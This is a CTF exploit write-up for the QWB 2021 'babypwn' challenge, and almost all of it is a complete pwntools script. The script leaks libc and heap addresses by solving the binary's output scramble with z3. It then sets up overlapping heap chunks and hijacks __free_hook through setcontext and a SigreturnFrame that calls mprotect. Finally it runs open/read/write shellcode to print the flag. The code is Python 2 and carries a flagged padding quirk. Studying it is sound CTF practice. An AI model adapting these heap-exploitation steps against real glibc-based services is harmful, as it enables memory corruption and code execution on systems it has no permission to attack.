
qwb2021 pwn复现




babypwn

exp

from pwn import *
from z3 import *
context.log_level = 'debug'

# Paths to the glibc 2.27 loader/libc bundle the author ran the binary under.
LD_PATH = "/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so"
LIBC_PRELOAD = '/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so:./libseccomp.so.2'
# Launch ./babypwn through that loader with the matching libc (and the
# challenge's libseccomp) preloaded; `p` is the process handle used by every
# helper below.
p = process([LD_PATH, "./babypwn"], env={'LD_PRELOAD': LIBC_PRELOAD})
#p=process('./babypwn')
def add(size):
  """Select menu option 1 and request a chunk of ``size`` bytes."""
  send = p.sendlineafter
  send('>>> \n', '1')
  send('size:\n', str(size))

def edit(index, content):
  """Select menu option 3 and write ``content`` into chunk ``index``.

  ``content`` is passed through unchanged, so the caller controls length.
  """
  send = p.sendlineafter
  send('>>> \n', '3')
  send('index:\n', str(index))
  send('content:\n', content)

def free(index):
  """Select menu option 2 and release chunk ``index``."""
  send = p.sendlineafter
  send('>>> \n', '2')
  send('index:\n', str(index))

def show(index):
  """Select menu option 4 and ask the program to print chunk ``index``."""
  send = p.sendlineafter
  send('>>> \n', '4')
  send('index:\n', str(index))
  
def solve(target):
  """Invert the 32-bit scrambling applied to printed values.

  The program's output transform is modelled symbolically: two rounds of
  ``t = x ^ 32*x; u = t ^ (t >> 17); x = u ^ (u << 13)`` (logical shift).
  z3 is asked for the 32-bit input that produces ``target``; the first
  model is returned as an int.  Raises AssertionError if no model exists.
  """
  seed = BitVec('a1', 32)
  x = seed
  for _ in range(2):
    # x ^ (32*x) ^ LShR(t,17) ^ (u << 13) collapses to u ^ (u << 13),
    # since XOR is associative and commutative.
    t = x ^ (32 * x)
    u = t ^ LShR(t, 17)
    x = u ^ (u << 13)
  solver = Solver()
  solver.add(x == target)
  assert solver.check() == sat
  return solver.model()[seed].as_long()

#leak libc_base
# From here on the script is a linear sequence against the live process.
# It uses Python 2 syntax (`print i` below), so it will not run unmodified
# on Python 3 / current pwntools.
add(0x1f0)
add(0x200)
for i in range(2,9):
  add(0x1f0)
#pause()
for i in range(2,9):
  free(i)
free(0)


for i in range(7):
  add(0x1f0)
  print i  # Python 2 print statement
  #pause()
  # Every re-allocated chunk except index 5 is filled with a repeated
  # (0, 0x21) pattern; 0x18 repetitions of 16 bytes = 0x180 bytes.
  if i!=5:
    edit(i,(p64(0)+p64(0x21))*0x18)

 
add(0xa0)
show(8)
# Must be the same build that was preloaded at process start; the offset
# 0x3ebe90 below is specific to it.
libc=ELF('/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
# show() yields two hex lines; each is decoded through solve() and the
# pair is joined as low/high 32-bit halves.
tmp1=solve(int('0x'+p.recvline(keepends=False),16))
tmp2=solve(int('0x'+p.recvline(keepends=False),16))

addr=(tmp2<<32)+tmp1
print hex(addr)  # Python 2 print statement
base=addr-0x3ebe90  # build-specific offset; recompute for any other libc
libc.address=base

#leak heap_base
add(0x140)
free(8)
free(9)
show(5)
# Same two-line decode as the libc leak above.
tmp1=solve(int('0x'+p.recvline(keepends=False),16))
tmp2=solve(int('0x'+p.recvline(keepends=False),16))
addr=(tmp2<<32)+tmp1
print hex(addr)  # Python 2 print statement

# 0x12c0 is the author's measured distance from the leaked value to the
# start of the heap; it depends on the allocation sequence above.
heapbase=addr-0x12c0

# Attaches a debugger to the running process; the script waits here until
# the debugger continues.  The pause() calls below likewise block for
# manual inspection — remove them to run unattended.
gdb.attach(p)

add(0xa0)#8
add(0x148)#9
addr=heapbase+0xcb0  # heap-relative target address (author's constant)
edit(9,'a'*0x148)
pause()
# Payload for chunk 9: two copies of addr, padded to 0x140, then a size
# field of 0x150+0xa0.
py=p64(addr)*2
py=py.ljust(0x140,'a')+p64(0x150+0xa0)
edit(9,py)
edit(8,p64(0)+p64(0x1f0)+p64(addr)*2)
edit(1,'a'*0x1f0+p64(0)+p64(0x251))
pause()
add(0x1f0)
pause()
free(0)
for i in range(2,8):
  free(i)
pause()
free(1)#overlap

# Symbol addresses resolved against the leaked libc base set earlier.
free_hook=libc.sym['__free_hook']
system=libc.sym['system']  # resolved but not referenced later in the script
setcontext=libc.sym['setcontext']+53
mprotect=libc.sym['mprotect']
pause()
add(0x120)#0
add(0x140)#1
pause()
free(1)
free(9)
pause()
# 8 bytes of "./flag\0\0", 152 filler bytes, then the free_hook address.
edit(0,'./flag\x00\x00'+'a'*152+p64(free_hook))#fastbin_attack
pause()
add(0x140)#1
add(0x140)#2

pause()
context.arch='amd64'
# Register image written into chunk 0 (pwntools SigreturnFrame); the
# fields set here are the only ones the author relies on.
sig=SigreturnFrame()
sig.rsp=free_hook+0x10
sig.rbp=sig.rsp
sig.rip=mprotect
sig.rdi=free_hook&0xfffffffffffff000  # page-aligned
sig.rsi=0x1000
sig.rdx=7
sig.csgsfs=0x2b000000000033
edit(0,str(sig))
pause()
# Assembly source is a runtime string; the {sh}/{bss1}/{bss2} placeholders
# are filled with addresses relative to free_hook before assembling.
shellcode='''
mov rax,2
mov rdi,{sh}
mov rsi,0
syscall

xor rax,rax
mov rdi,3
mov rsi,{bss1}
mov rdx,0x300
syscall

mov rax,1
mov rdi,1
mov rsi,{bss2}
mov rdx,0x100
syscall
'''.format(sh=free_hook+0x78,bss1=free_hook-0x500,bss2=free_hook-0x500)
shellcode=asm(shellcode)
py=p64(setcontext)+'flag\x00\x00\x00\x00'+p64(free_hook+0x18)+shellcode
# NOTE(review): this appends a 0x100-padded copy of py to itself rather
# than padding py in place (py = py.ljust(...)); confirm that is intended.
py+=py.ljust(0x100,'\x90')
py+="flag\x00\x00\x00\x00"
edit(2,py)
pause()
free(0)
p.interactive()

 

来源: https://www.cnblogs.com/mio-yy/p/15120426.html
